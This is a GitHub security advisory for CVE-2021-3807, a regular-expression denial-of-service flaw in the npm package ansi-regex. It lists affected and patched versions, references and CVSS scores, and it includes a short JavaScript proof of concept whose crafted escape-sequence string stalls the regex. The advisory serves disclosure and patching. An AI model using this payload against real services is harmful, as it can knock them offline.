Inefficient Regular Expression Complexity in chalk/ansi-regex
High severity GitHub Reviewed PublishedSep 20, 2021 to the GitHub Advisory Database • UpdatedSep 21, 2023
Package
ansi-regex (npm)
Affected versions
>= 6.0.0, < 6.0.1
>= 5.0.0, < 5.0.1
>= 4.0.0, < 4.1.1
>= 3.0.0, < 3.0.1
Patched versions
6.0.1
5.0.1
4.1.1
3.0.1
Description
ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
Proof of Concept
importansiRegexfrom'ansi-regex';for(vari=1;i<=50000;i++){vartime=Date.now();varattack_str="\u001B["+";".repeat(i*10000);ansiRegex().test(attack_str)vartime_cost=Date.now()-time;console.log("attack_str.length: "+attack_str.length+": "+time_cost+" ms")}
The ReDOS is mainly due to the sub-patterns[[\\]()#;?]* and(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*
References
- https://nvd.nist.gov/vuln/detail/CVE-2021-3807
- chalk/ansi-regex@8d1d7cd
- https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994
- chalk/ansi-regex#38 (comment)
- https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908
- chalk/ansi-regex#38 (comment)
- https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20221014-0002/
- chalk/ansi-regex@419250f
- chalk/ansi-regex@75a657d
- chalk/ansi-regex@c3c0b3f
Published by theNational Vulnerability DatabaseSep 17, 2021
ReviewedSep 20, 2021
Published to the GitHub Advisory DatabaseSep 20, 2021
Last updatedSep 21, 2023
Severity
High
CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS score
(41st percentile)
CVE ID
CVE-2021-3807
GHSA ID
GHSA-93q8-gq69-wqmw
Source code
Credits
MylesBorinsAnalyst
cji-stripeAnalyst
G-RathAnalyst
LoadingChecking history
See something to contribute?Suggest improvements for this vulnerability.